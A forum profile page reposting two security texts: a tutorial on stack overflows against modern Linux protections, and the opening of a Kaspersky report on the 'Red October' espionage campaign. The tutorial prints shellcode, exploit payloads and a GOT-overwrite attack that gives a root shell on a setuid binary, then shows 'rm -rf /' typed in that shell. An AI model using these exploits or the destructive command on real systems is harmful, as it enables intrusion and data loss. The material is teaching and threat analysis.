Everything posted by Nytro

  1. Stack Smashing On A Modern Linux System
     21 December, 2012 - 06:56 — jip

     Prerequisites: Basic understanding of C and x86_64 assembly.

     +++++++++++++++++++++++++++++++++++++++++++
     + Stack Smashing On A Modern Linux System +
     + jip@soldierx.com                        +
     +++++++++++++++++++++++++++++++++++++++++++

     [1. Introduction]

     This tutorial will attempt to show the reader the basics of stack overflows and explain some of the protection mechanisms present in modern Linux distributions. For this purpose the latest version of Ubuntu (12.10) has been chosen, because it incorporates several security mechanisms by default, and is a popular distribution that is easy to install and use. The platform is x86_64.

     The reader will learn how stack overflows were originally exploited on older systems that did not have these mechanisms in place by default. The individual protections in the latest version of Ubuntu at the time of writing (12.10) will be explained, and a case will be presented in which these are not sufficient to prevent the overflowing of a data structure on the stack that results in control of the program's execution path. Although the method of exploitation presented does not resemble the classical method of overflowing (or "smashing") the stack, and is in fact closer to the method used for heap overflows or format string bugs (exploiting an arbitrary write), the overflow does happen on the stack, in spite of Stack Smashing Protection being used to prevent stack overflows. If this does not make sense to you yet, don't worry. I will go into more detail below.

     [2. System details]

     An overview of the default security mechanisms deployed in different versions of Ubuntu can be found here: https://wiki.ubuntu.com/Security/Features

     -----------------------------------
     $ uname -srp && cat /etc/lsb-release | grep DESC && gcc --version | grep gcc
     Linux 3.5.0-19-generic x86_64
     DISTRIB_DESCRIPTION="Ubuntu 12.10"
     gcc (Ubuntu/Linaro 4.7.2-2ubuntu1) 4.7.2
     -----------------------------------

     [3. The classical stack overflow]

     Let's go back in time. Life was easy and stack frames were there to be smashed. Sloppy use of data copying functions on the stack could easily result in total control over the program, and not many protection mechanisms had to be taken into account, as demonstrated below.

     -----------------------------------
     $ cat oldskool.c
     #include <string.h>

     void go(char *data) {
         char name[64];
         strcpy(name, data);
     }

     int main(int argc, char **argv) {
         go(argv[1]);
     }
     -----------------------------------

     Before testing, you should disable ASLR system-wide. You can do this as follows:

     -----------------------------------
     $ sudo -i
     root@laptop:~# echo "0" > /proc/sys/kernel/randomize_va_space
     root@laptop:~# exit
     logout
     -----------------------------------

     On very old systems this protection mechanism didn't exist, so for the purpose of this historical example it has been disabled. To disable the other protections, compile the example as follows:

     $ gcc oldskool.c -o oldskool -zexecstack -fno-stack-protector -g

     Looking at the rest of the example, we see that a buffer of 64 bytes is allocated on the stack, and that the first command line argument is copied into this buffer. The program does not check whether that argument is longer than 64 bytes, allowing strcpy() to keep copying data past the end of the buffer into adjacent memory on the stack. This is known as a stack overflow.
Now, in order to gain control of execution of the program, we are going to use the fact that before entering a function, any C program pushes the address of the instruction it is supposed to execute after completing the function onto the stack. We call this address the return address, or Saved Instruction Pointer (SIP). In our example, the Saved Instruction Pointer (the address of the instruction that is supposed to be executed after completion of the go() function) is stored next to our name[64] buffer, because of the way the stack works. So if the user can overwrite this return address with an arbitrary address (supplied via the command line argument), the program will continue executing at that address.

An attacker can hijack the flow of execution by copying instructions in their machine code form into the buffer, and then pointing the return address at those instructions. When the program is done executing the function, it will continue executing the instructions provided by the attacker. The attacker can now make the program do anything for fun and profit. Enough talk, let me show you. If you don't understand the following commands, you can find a tutorial on how to use gdb here: http://beej.us/guide/bggdb/

-----------------------------------
$ gdb -q ./oldskool
Reading symbols from /home/me/.hax/vuln/oldskool...done.
(gdb) disas main
Dump of assembler code for function main:
   0x000000000040053d <+0>:  push   %rbp
   0x000000000040053e <+1>:  mov    %rsp,%rbp
   0x0000000000400541 <+4>:  sub    $0x10,%rsp
   0x0000000000400545 <+8>:  mov    %edi,-0x4(%rbp)
   0x0000000000400548 <+11>: mov    %rsi,-0x10(%rbp)
   0x000000000040054c <+15>: mov    -0x10(%rbp),%rax
   0x0000000000400550 <+19>: add    $0x8,%rax
   0x0000000000400554 <+23>: mov    (%rax),%rax
   0x0000000000400557 <+26>: mov    %rax,%rdi
   0x000000000040055a <+29>: callq  0x40051c <go>
   0x000000000040055f <+34>: leaveq
   0x0000000000400560 <+35>: retq
End of assembler dump.
(gdb) break *0x40055a
Breakpoint 1 at 0x40055a: file oldskool.c, line 11.
(gdb) run myname
Starting program: /home/me/.hax/vuln/oldskool myname

Breakpoint 1, 0x000000000040055a in main (argc=2, argv=0x7fffffffe1c8)
11          go(argv[1]);
(gdb) x/i $rip
=> 0x40055a <main+29>:  callq  0x40051c <go>
(gdb) i r rsp
rsp            0x7fffffffe0d0   0x7fffffffe0d0
(gdb) si
go (data=0xc2 ) at oldskool.c:4
4       void go(char *data) {
(gdb) i r rsp
rsp            0x7fffffffe0c8   0x7fffffffe0c8
(gdb) x/gx $rsp
0x7fffffffe0c8: 0x000000000040055f
-----------------------------------

We set a breakpoint right before the call to go(), at 0x000000000040055a <+29>. Then we run the program with the argument "myname", and it stops before calling go(). We execute one instruction (si) and see that the stack pointer (rsp) now points to a location containing the address of the instruction right after the callq, 0x000000000040055f <+34>. This demonstrates exactly what was discussed above. The following output will demonstrate that when the go() function is done, it will execute the "retq" instruction, which will pop this pointer off the stack and continue execution at whatever address it points to.

-----------------------------------
(gdb) disas go
Dump of assembler code for function go:
=> 0x000000000040051c <+0>:  push   %rbp
   0x000000000040051d <+1>:  mov    %rsp,%rbp
   0x0000000000400520 <+4>:  sub    $0x50,%rsp
   0x0000000000400524 <+8>:  mov    %rdi,-0x48(%rbp)
   0x0000000000400528 <+12>: mov    -0x48(%rbp),%rdx
   0x000000000040052c <+16>: lea    -0x40(%rbp),%rax
   0x0000000000400530 <+20>: mov    %rdx,%rsi
   0x0000000000400533 <+23>: mov    %rax,%rdi
   0x0000000000400536 <+26>: callq  0x4003f0 <strcpy@plt>
   0x000000000040053b <+31>: leaveq
   0x000000000040053c <+32>: retq
End of assembler dump.
(gdb) break *0x40053c
Breakpoint 2 at 0x40053c: file oldskool.c, line 8.
(gdb) continue
Continuing.
Breakpoint 2, 0x000000000040053c in go (data=0x7fffffffe4b4 "myname")
8       }
(gdb) x/i $rip
=> 0x40053c <go+32>:  retq
(gdb) x/gx $rsp
0x7fffffffe0c8: 0x000000000040055f
(gdb) si
main (argc=2, argv=0x7fffffffe1c8) at oldskool.c:12
12      }
(gdb) x/gx $rsp
0x7fffffffe0d0: 0x00007fffffffe1c8
(gdb) x/i $rip
=> 0x40055f <main+34>:  leaveq
(gdb) quit
-----------------------------------

We set a breakpoint right before the go() function returns and continue execution. The program stops right before executing the "retq" instruction. We see that the stack pointer (rsp) still points to the address inside main that the program is supposed to jump to after finishing the execution of go(). The retq instruction is executed, and we see that the program has indeed popped the return address off the stack and jumped to it. Now we are going to overwrite this address by supplying more than 72 bytes of data, using perl:

-----------------------------------
$ gdb -q ./oldskool
Reading symbols from /home/me/.hax/vuln/oldskool...done.
(gdb) run `perl -e 'print "A"x80'`
Starting program: /home/me/.hax/vuln/oldskool `perl -e 'print "A"x80'`

Program received signal SIGSEGV, Segmentation fault.
0x000000000040059c in go (data=0x7fffffffe49a 'A' )
12      }
(gdb) x/i $rip
=> 0x40059c : retq
(gdb) x/gx $rsp
0x7fffffffe0a8: 0x4141414141414141
-----------------------------------

We use perl to print a string of 80 x "A" on the command line, and pass that as an argument to our example program. We see that the program crashes when it tries to execute the "retq" instruction inside the go() function, since it tries to jump to the return address, which we have overwritten with "A"s (0x41). Note that we have to write 80 bytes (64 + 8 + 8) because pointers are 8 bytes long on 64-bit machines, and there is actually another stored pointer (the saved base pointer) between our name buffer and the Saved Instruction Pointer. Okay, so now we can redirect the execution path to any location we want. How can we use this to make the program do our bidding?
If we place our own machine code instructions inside the name[] buffer and then overwrite the return address with the address of the beginning of this buffer, the program will continue executing our instructions (or "shellcode") after it is done executing the go() function. So we need to create a shellcode, and we need to know the address of the name[] buffer, so we know what to overwrite the return address with. I will not go into creating shellcode, as that is a little outside the scope of this tutorial, but will instead provide you with a shellcode that prints a message to the screen. We can determine the address of the name[] buffer like this:

-----------------------------------
(gdb) p &name
$2 = (char (*)[64]) 0x7fffffffe0a0
-----------------------------------

We can use perl to print unprintable characters to the command line by escaping them like this: "\x41". Furthermore, because of the way little-endian machines store integers and pointers, we have to reverse the order of the bytes. So the value we will use to overwrite the Saved Instruction Pointer will be: "\xa0\xe0\xff\xff\xff\x7f"

This is the shellcode that will print our message to the screen and then exit:

"\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff\xc7\x5e\x48
\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd9
\xff\xff\xff\x48\x61\x78\x21"

Note that these are just instructions in machine code form, escaped so that they are printable with perl. Because the shellcode is 45 bytes long, and we need to provide 72 bytes of data before we can overwrite the SIP, we have to add 27 bytes as padding. So the string we use to own the program looks like this:

"\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff\xc7\x5e\x48
\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd9
\xff\xff\xff\x48\x61\x78\x21" . "A"x27 . "\xa0\xe0\xff\xff\xff\x7f"

The program will jump to 0x7fffffffe0a0 when it is done executing the function go().
This is where the name[] buffer is located, which we have filled with our machine code. It should then execute our machine code, print our message and exit the program. Let's try it (note that you should remove all line breaks when you try to reproduce this):

-----------------------------------
$ ./oldskool `perl -e 'print "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48
\xff\xc0\x48\xff\xc7\x5e\x48\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c
\x48\x31\xff\x0f\x05\xe8\xd9\xff\xff\xff\x48\x61\x78\x21" . "A"x27 . "\xa0\xe0
\xff\xff\xff\x7f"'`
Hax!$
-----------------------------------

It worked! Our important message has been delivered, and the process has exited.

[4. Protection mechanisms]

Welcome back to 2012. The example above no longer works, on many levels. There are a lot of different protection mechanisms in place today on our Ubuntu system, and this particular type of vulnerability does not even exist in this form anymore. There are still overflows that can happen on the stack, though, and there are still ways of exploiting them. That is what I want to show you in this section, but first let's look at the different protection schemes.

[4.1 Stack Smashing Protection]

In the first example, we used the -fno-stack-protector flag to indicate to gcc that we did not want to compile with stack smashing protection. What happens if we leave this out, along with the other flags we passed earlier? Note that at this point ASLR is back on, so everything is set to its defaults.

$ gcc oldskool.c -o oldskool -g

Let's look at the binary with gdb for a minute and see what's going on.

-----------------------------------
$ gdb -q ./oldskool
Reading symbols from /home/me/.hax/vuln/oldskool...done.
(gdb) disas go
Dump of assembler code for function go:
   0x000000000040058c <+0>:  push   %rbp
   0x000000000040058d <+1>:  mov    %rsp,%rbp
   0x0000000000400590 <+4>:  sub    $0x60,%rsp
   0x0000000000400594 <+8>:  mov    %rdi,-0x58(%rbp)
   0x0000000000400598 <+12>: mov    %fs:0x28,%rax
   0x00000000004005a1 <+21>: mov    %rax,-0x8(%rbp)
   0x00000000004005a5 <+25>: xor    %eax,%eax
   0x00000000004005a7 <+27>: mov    -0x58(%rbp),%rdx
   0x00000000004005ab <+31>: lea    -0x50(%rbp),%rax
   0x00000000004005af <+35>: mov    %rdx,%rsi
   0x00000000004005b2 <+38>: mov    %rax,%rdi
   0x00000000004005b5 <+41>: callq  0x400450 <strcpy@plt>
   0x00000000004005ba <+46>: mov    -0x8(%rbp),%rax
   0x00000000004005be <+50>: xor    %fs:0x28,%rax
   0x00000000004005c7 <+59>: je     0x4005ce <go+66>
   0x00000000004005c9 <+61>: callq  0x400460 <__stack_chk_fail@plt>
   0x00000000004005ce <+66>: leaveq
   0x00000000004005cf <+67>: retq
End of assembler dump.
-----------------------------------

If we look at go+12 and go+21, we see that a value is taken from %fs:0x28. What exactly this address points to is not very important; for now I will just say that fs points to structures maintained by the kernel, and we can't actually inspect the value of fs using gdb. What is more important to us is that this location contains a random value that we cannot predict, as demonstrated:

-----------------------------------
(gdb) break *0x0000000000400598
Breakpoint 1 at 0x400598: file oldskool.c, line 4.
(gdb) run
Starting program: /home/me/.hax/vuln/oldskool

Breakpoint 1, go (data=0x0) at oldskool.c:4
4       void go(char *data) {
(gdb) x/i $rip
=> 0x400598 <go+12>:  mov    %fs:0x28,%rax
(gdb) si
0x00000000004005a1      4       void go(char *data) {
(gdb) i r rax
rax            0x110279462f20d000   1225675390943547392
(gdb) run
The program being debugged has been started already.
Start it from the beginning?
(y or n) y
Starting program: /home/me/.hax/vuln/oldskool

Breakpoint 1, go (data=0x0) at oldskool.c:4
4       void go(char *data) {
(gdb) si
0x00000000004005a1      4       void go(char *data) {
(gdb) i r rax
rax            0x21f95d1abb2a0800   2448090241843202048
-----------------------------------

We break right before the instruction that moves the value from %fs:0x28 into rax, execute it, inspect rax, then repeat the whole process, and see clearly that the value changed between runs. So this is a value that is different every time the program runs, which means an attacker can't reliably predict it.

So how is this value used to protect the stack? If we look at go+21, we see that the value is copied onto the stack, at location -0x8(%rbp). If we look at the prologue to deduce what that points at, we see that this random value sits right between the function's local variables and the saved instruction pointer. This is called a "canary" value, after the canaries miners used to warn them of gas leaks, since the canary would die well before any human was in danger. Much like that situation, when a stack overflow occurs, the canary value is the first to die, before the saved instruction pointer can be overwritten.

If we look at go+46 and go+50, we see that the value is read back from the stack and compared to the original. If they are equal, the canary has not been changed, and thus the saved instruction pointer hasn't been altered either, allowing the function to return safely. If the value has changed, a stack overflow has occurred and the saved instruction pointer may have been compromised. Since it's not safe to return, the function instead calls the __stack_chk_fail function. This function does some magic, throws an error and eventually exits the process.
Here is the check failing in practice:

-----------------------------------
$ ./oldskool `perl -e 'print "A"x80'`
*** stack smashing detected ***: ./oldskool terminated
Aborted (core dumped)
-----------------------------------

So, to recap: the buffer is overflowed, and data is copied over the canary value and over the saved instruction pointer. However, before attempting to return to this overwritten SIP, the program detects that the canary has been tampered with and exits safely, before doing the attacker's bidding. Now, the bad news is that there is not really a good way around this for the attacker. You might think about bruteforcing the stack canary, but in this case it is different on every run, so you would have to be extremely lucky to hit the right value. It would take some time, and it would not be very stealthy either.

The good news is that there are plenty of situations in which this is not sufficient to prevent exploitation. For example, stack canaries only protect the SIP, not application variables. This can lead to other exploitable situations, as shown later. The oldskool method of "smashing" the stack frame to trick the program into returning to our code is effectively killed by this protection mechanism, though; it is no longer viable.

[4.2 NX: non-executable memory]

Now, you might have noticed we did not just skip the -fno-stack-protector flag this time, but also left out the -zexecstack flag. This flag told the system to allow us to execute instructions stored on the stack. Modern systems do not allow this: memory is marked either writable (for data) or executable (for instructions), and no region of memory will be both writable and executable at the same time. If you think about it, this means we have no way of storing shellcode in memory that the program could later execute.
Since we cannot write to the executable sections of memory, and the program can't execute instructions located in the writable sections of memory, we need some other way to trick the program into doing what we want. The answer is ROP, or Return-Oriented Programming. The trick is to use pieces of code that are already in the program itself, and thus located in the executable .text section of the binary, and chain them together so that they resemble our old shellcode. I will not go too deeply into this subject, but I will show you an example at the end of this tutorial. Let me finish by demonstrating that a program will fail when trying to execute instructions from the stack:

-----------------------------------
$ cat nx.c
int main(int argc, char **argv) {
    char shellcode[] =
        "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff"
        "\xc7\x5e\x48\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48"
        "\x31\xff\x0f\x05\xe8\xd9\xff\xff\xff\x48\x61\x78\x21";
    void (*func)() = (void *)shellcode;
    func();
}
$ gcc nx.c -o nx -zexecstack
$ ./nx
Hax!$
$ gcc nx.c -o nx
$ ./nx
Segmentation fault (core dumped)
-----------------------------------

We placed our shellcode from earlier in a buffer on the stack, and set a function pointer to point to that buffer before calling it. When we compile with -zexecstack as before, the code on the stack can be executed. Without the flag, the stack is marked non-executable by default, and the program fails with a segmentation fault.

[4.3 ASLR: Address Space Layout Randomization]

The last thing we disabled when trying out the classic stack overflow example was ASLR, by executing echo "0" > /proc/sys/kernel/randomize_va_space as root. ASLR makes sure that every time the program is loaded, its libraries and memory regions are mapped at random locations in virtual memory. This means that when running the program twice, buffers on the stack will have different addresses between runs.
This means that we cannot simply use a static stack address that we happened to find using gdb, because it will not be correct the next time the program is run. Note that gdb disables ASLR when debugging a program; we can re-enable it inside gdb for a more realistic view of what's going on, as shown below (output is trimmed on the right, the addresses are what's important here):

-----------------------------------
$ gdb -q ./oldskool
Reading symbols from /home/me/.hax/vuln/oldskool...done.
(gdb) set disable-randomization off
(gdb) break main
Breakpoint 1 at 0x4005df: file oldskool.c, line 11.
(gdb) run
Starting program: /home/me/.hax/vuln/oldskool

Breakpoint 1, main (argc=1, argv=0x7fffe22fe188) at oldskool.c:11
11          go(argv[1]);
(gdb) i proc map
process 6988
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
            0x400000           0x401000     0x1000        0x0 /home/me/.hax/vuln
            0x600000           0x601000     0x1000        0x0 /home/me/.hax/vuln
            0x601000           0x602000     0x1000     0x1000 /home/me/.hax/vuln
      0x7f0e120ef000     0x7f0e122a4000   0x1b5000        0x0 /lib/x86_64-linux-
      0x7f0e122a4000     0x7f0e124a3000   0x1ff000   0x1b5000 /lib/x86_64-linux-
      0x7f0e124a3000     0x7f0e124a7000     0x4000   0x1b4000 /lib/x86_64-linux-
      0x7f0e124a7000     0x7f0e124a9000     0x2000   0x1b8000 /lib/x86_64-linux-
      0x7f0e124a9000     0x7f0e124ae000     0x5000        0x0
      0x7f0e124ae000     0x7f0e124d0000    0x22000        0x0 /lib/x86_64-linux-
      0x7f0e126ae000     0x7f0e126b1000     0x3000        0x0
      0x7f0e126ce000     0x7f0e126d0000     0x2000        0x0
      0x7f0e126d0000     0x7f0e126d1000     0x1000    0x22000 /lib/x86_64-linux-
      0x7f0e126d1000     0x7f0e126d3000     0x2000    0x23000 /lib/x86_64-linux-
      0x7fffe22df000     0x7fffe2300000    0x21000        0x0 [stack]
      0x7fffe23c2000     0x7fffe23c3000     0x1000        0x0 [vdso]
  0xffffffffff600000 0xffffffffff601000     0x1000        0x0 [vsyscall]
(gdb) run
The program being debugged has been started already.
Start it from the beginning?
(y or n) y
Starting program: /home/me/.hax/vuln/oldskool

Breakpoint 1, main (argc=1, argv=0x7fff7e16cfd8) at oldskool.c:11
11          go(argv[1]);
(gdb) i proc map
process 6991
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
            0x400000           0x401000     0x1000        0x0 /home/me/.hax/vuln
            0x600000           0x601000     0x1000        0x0 /home/me/.hax/vuln
            0x601000           0x602000     0x1000     0x1000 /home/me/.hax/vuln
      0x7fdbb2753000     0x7fdbb2908000   0x1b5000        0x0 /lib/x86_64-linux-
      0x7fdbb2908000     0x7fdbb2b07000   0x1ff000   0x1b5000 /lib/x86_64-linux-
      0x7fdbb2b07000     0x7fdbb2b0b000     0x4000   0x1b4000 /lib/x86_64-linux-
      0x7fdbb2b0b000     0x7fdbb2b0d000     0x2000   0x1b8000 /lib/x86_64-linux-
      0x7fdbb2b0d000     0x7fdbb2b12000     0x5000        0x0
      0x7fdbb2b12000     0x7fdbb2b34000    0x22000        0x0 /lib/x86_64-linux-
      0x7fdbb2d12000     0x7fdbb2d15000     0x3000        0x0
      0x7fdbb2d32000     0x7fdbb2d34000     0x2000        0x0
      0x7fdbb2d34000     0x7fdbb2d35000     0x1000    0x22000 /lib/x86_64-linux-
      0x7fdbb2d35000     0x7fdbb2d37000     0x2000    0x23000 /lib/x86_64-linux-
      0x7fff7e14d000     0x7fff7e16e000    0x21000        0x0 [stack]
      0x7fff7e1bd000     0x7fff7e1be000     0x1000        0x0 [vdso]
  0xffffffffff600000 0xffffffffff601000     0x1000        0x0 [vsyscall]
-----------------------------------

We set "disable-randomization" to "off", run the program twice and inspect the mappings, and see that most of them have different addresses between runs. Indeed, not all of them do: the binary itself is still mapped at 0x400000 both times, since it is not compiled as position-independent code, and this is the key to successful exploitation with ASLR enabled.

[5. Modern stack overflow]

So, even with all these protection mechanisms in place, sometimes there is room for an overflow, and sometimes that overflow leads to successful exploitation. I showed you how the stack canary protects the stack frame from being messed up and the SIP from being overwritten by copying past the end of a local buffer. But stack canaries are only placed before the SIP, not between variables located on the stack. So it is still possible for a variable on the stack to be overwritten in the same fashion as the SIP was overwritten in our first example.
This can lead to a lot of different problems. In some cases we can simply overwrite a function pointer that is called at some point. In other cases we can overwrite a pointer that is later used to write or read data, and thus control that read or write. This is what I am going to show you. By overflowing a buffer on the stack and overwriting a pointer on the stack that is later used to write user-supplied data, the attacker can write data to an arbitrary location. A situation like this can often be exploited to gain control of execution. Here is the source code of the example vulnerability:

-----------------------------------
$ cat stackvuln.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define MAX_SIZE 48
#define BUF_SIZE 64

char data1[BUF_SIZE], data2[BUF_SIZE];

struct item {
    char data[MAX_SIZE];
    void *next;
};

int go(void) {
    struct item item1, item2;
    item1.next = &item2;
    item2.next = &item1;
    memcpy(item1.data, data1, BUF_SIZE); // Whoops, did we mean MAX_SIZE?
    memcpy(item1.next, data2, MAX_SIZE); // Yes, yes we did.
    exit(-1); // Exit in shame.
}

void hax(void) {
    execl("/bin/bash", "/bin/bash", "-p", NULL);
}

void readfile(char *filename, char *buffer, int len) {
    FILE *fp;
    fp = fopen(filename, "r");
    if (fp != NULL) {
        fread(buffer, 1, len, fp);
        fclose(fp);
    }
}

int main(int argc, char **argv) {
    readfile("data1.dat", data1, BUF_SIZE);
    readfile("data2.dat", data2, BUF_SIZE);
    go();
}
$ gcc stackvuln.c -o stackvuln
$ sudo chown root:root stackvuln
$ sudo chmod +s ./stackvuln
-----------------------------------

For the purpose of this example, I have included the hax() function, which is obviously where we want to redirect execution to.
Originally I wanted to include an example using a ROP chain to call a function like system(), but I decided not to, for two reasons: it is perhaps a little out of scope for this tutorial and would make it too hard to follow for beginners, and besides that, it was quite hard to find good gadgets in a program this small. The use of this function does illustrate the point that because of NX we can't push our own shellcode onto the stack and execute it; we have to reuse code that is already in the program (be it a function, or a chain of ROP gadgets). Google ROP exploitation if you are interested in the real deal.

Our overflow happens in the go() function. It creates a circular list with two items of the 'struct item' type. The first memcpy accidentally copies too many bytes into the structure, allowing us to overwrite the "next" pointer, which is used as the destination of the second call. So, if we can overwrite the next pointer with an address of our choice, we control where the second memcpy writes to. Besides that, we also control data1 and data2, because these buffers are read from files. This data could have come from a network connection or some other input, but I chose files because they allow us to easily alter the payloads for demonstration purposes. So, we can write any 48 bytes we want, to any location we want. How can we use this to gain control of the program?

We are going to use a structure called the GOT/PLT. I will try to explain quickly what it is, but if you need more information, there is a lot of it on the web. The .got.plt is a table of addresses that a binary uses to keep track of the locations of functions that live in a library. As I explained before, ASLR makes sure that a library is mapped at a different virtual memory address every time the program runs. So the program can't use static absolute addresses to refer to functions inside these libraries, because those addresses would change every run.
So, the short version is: the binary uses a mechanism that calls a stub to calculate the real address of the function, stores it in a table, and uses that for future reference. Every time the function is called, the address inside this table (.got.plt) is used. We can abuse this by overwriting that address, so that the next time the program thinks it's calling the function that corresponds with that particular entry, it is redirected to an instruction of our choice, much like the redirection we achieved before by overwriting the return pointer.

If we look at our example, we see that exit() is called right after the calls to memcpy(). So, if we can use the arbitrary write provided by those calls to overwrite the .got.plt entry of exit(), the program will jump to the address we provide instead of the address of exit() inside libc. Which address will we use? You guessed it: the address of hax(). First, let me show you how the .got.plt is used when exit() is called:

-----------------------------------
$ cat exit.c
#include <stdlib.h>

int main(int argc, char **argv) {
    exit(0);
}
$ gcc exit.c -o exit -g
$ gdb -q ./exit
Reading symbols from /home/me/.hax/plt/exit...done.
(gdb) disas main
Dump of assembler code for function main:
   0x000000000040051c <+0>:  push   %rbp
   0x000000000040051d <+1>:  mov    %rsp,%rbp
   0x0000000000400520 <+4>:  sub    $0x10,%rsp
   0x0000000000400524 <+8>:  mov    %edi,-0x4(%rbp)
   0x0000000000400527 <+11>: mov    %rsi,-0x10(%rbp)
   0x000000000040052b <+15>: mov    $0x0,%edi
   0x0000000000400530 <+20>: callq  0x400400 <exit@plt>
End of assembler dump.
(gdb) x/i 0x400400
   0x400400 <exit@plt>: jmpq   *0x200c1a(%rip)        # 0x601020 <exit@got.plt>
(gdb) x/gx 0x601020
0x601020 <exit@got.plt>: 0x0000000000400406
-----------------------------------

We see at main+20 that instead of calling exit() inside libc directly, 0x400400 is called, which is a stub inside the PLT. It jumps to whatever address is located at 0x601020, inside the .got.plt.
Now, in this case, that is an address back inside the stub again, which resolves the address of the function inside libc and replaces the entry at 0x601020 with the real address of exit(). So whenever exit() is called, the address at 0x601020 is used, regardless of whether the real address has been resolved yet or not. So, we need to overwrite this location with the address of the hax() function, and the program will execute that function instead of exit().

For our example vulnerability, we need to locate the entry for exit() inside the .got.plt, overwrite the pointer in the structure with this address, and then fill the data2 buffer with the pointer to the hax() function. The first memcpy call will then overwrite the item1.next pointer with the pointer to the exit() entry inside the .got.plt, and the second call will overwrite that location with the pointer to hax(). After that, exit() is called, so our pointer is used and hax() will execute, spawning a root shell. Let's go! Oh, one more thing: because the entry of execl() is located right after the entry of exit(), and our memcpy call will copy 48 bytes, we need to make sure that this entry is not wrecked, by including its original value in our payload.

-----------------------------------
(gdb) mai i sect .got.plt
Exec file:
    `/tmp/stackvuln/stackvuln', file type elf64-x86-64.
    0x00601000->0x00601050 at 0x00001000: .got.plt ALLOC LOAD DATA HAS_CONTENTS
(gdb) x/10gx 0x601000
0x601000:                  0x0000000000600e28  0x0000000000000000
0x601010:                  0x0000000000000000  0x0000000000400526
0x601020 <fclose@got.plt>: 0x0000000000400536  0x0000000000400546
0x601030 <memcpy@got.plt>: 0x0000000000400556  0x0000000000400566
0x601040 <exit@got.plt>:   0x0000000000400576  0x0000000000400586
(gdb) p hax
$1 = {<text variable, no debug info>} 0x40073b <hax>
-----------------------------------

Okay, so the entry of exit() is at 0x601040, and hax() is at 0x40073b.
Let's construct our payloads:

-----------------------------------
$ hexdump data1.dat -vC
00000000  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000010  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000020  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000030  40 10 60 00 00 00 00 00                           |@.`.....|
00000038
$ hexdump data2.dat -vC
00000000  3b 07 40 00 00 00 00 00  86 05 40 00 00 00 00 00  |;.@.......@.....|
00000010
-----------------------------------

For the first call, we use 48 bytes of padding and then overwrite the "next" pointer with a pointer to the .got.plt entry. Remember that because we are on a little-endian architecture, the order of the individual bytes of the address is reversed. The second file contains the pointer to hax(), which will be written into the exit() entry of the .got.plt. The second address is the entry of execl(), and contains its original address, just to make sure it is still callable. After the two calls to memcpy(), exit@plt will be called and will use our address of hax() from the .got.plt. This means hax() gets executed:

-----------------------------------
$ ./stackvuln
bash-4.2# whoami
root
bash-4.2# rm -rf /
-----------------------------------

Source: Vulnerability analysis, Security Papers, Exploit Tutorials
  2. "Red October" Diplomatic Cyber Attacks Investigation

Contents
- Executive Summary
- Anatomy of the attack
  - General description
  - Step-by-step description (1st stage)
  - Step-by-step description (2nd stage)
- Timeline
- Targets
  - KSN statistics
  - Sinkhole statistics
  - KSN + sinkhole data
- C&C information

Executive Summary

In October 2012, Kaspersky Lab’s Global Research & Analysis Team initiated a new threat research after a series of attacks against computer networks of various international diplomatic service agencies. A large scale cyber-espionage network was revealed and analyzed during the investigation, which we called «Red October» (after the famous novel «The Hunt for Red October»). This report is based on detailed technical analysis of a series of targeted attacks against diplomatic, governmental and scientific research organizations in different countries, mostly related to the region of Eastern Europe, former USSR members and countries in Central Asia. The main objective of the attackers was to gather intelligence from the compromised organizations, which included computer systems, personal mobile devices and network equipment. The earliest evidence indicates that the cyber-espionage campaign has been active since 2007 and is still active at the time of writing (January 2013). Besides that, registration data used for the purchase of several Command & Control (C&C) servers and unique malware filenames related to the current attackers hint at an even earlier time of activity, dating back to May 2007.

Main Findings

Advanced Cyber-espionage Network: The attackers have been active for at least several years, focusing on diplomatic and governmental agencies of various countries across the world. Information harvested from infected networks was reused in later attacks. For example, stolen credentials were compiled in a list and used when the attackers needed to guess the secret phrase in other locations. 
To control the network of infected machines, the attackers created more than 60 domain names and several server hosting locations in different countries (mainly Germany and Russia). The C&C infrastructure is actually a chain of servers working as proxies and hiding the location of the ‘mothership’ control server.

Unique architecture: The attackers created a multi-functional kit which has a capability of quick extension of the features that gather intelligence. The system is resistant to C&C server takeover and allows the attackers to recover access to infected machines using alternative communication channels.

Broad variety of targets: Besides traditional attack targets (workstations), the system is capable of stealing data from mobile devices, such as smartphones (iPhone, Nokia, Windows Mobile), enterprise network equipment (Cisco) and removable disk drives (including already deleted files, via a custom file recovery procedure).

Importation of exploits: The samples we managed to find were using exploit code for vulnerabilities in Microsoft Word and Microsoft Excel that were created by other attackers and employed during different cyber attacks. The attackers left the imported exploit code untouched, perhaps to harden the identification process.

Attacker identification: Based on the registration data of the C&C servers and numerous artifacts left in executables of the malware, we strongly believe that the attackers have Russian-speaking origins. The current attackers and the executables developed by them had been unknown until recently, and have never been related to any other targeted cyber attacks. 
Anatomy of the attack

General description

These attacks followed the classical scenario of specific targeted attacks, consisting of two major stages:
- Initial infection
- Additional modules deployed for intelligence gathering

The malicious code was delivered via e-mail as attachments (Microsoft Excel, Word and, probably, PDF documents) which were rigged with exploit code for known security vulnerabilities in the mentioned applications. Right after the victim opened the malicious document on a vulnerable system, the embedded malicious code initiated the setup of the main component, which in turn handled further communication with the C&C servers. Next, the system receives a number of additional spy modules from the C&C server, including modules to handle infection of smartphones.

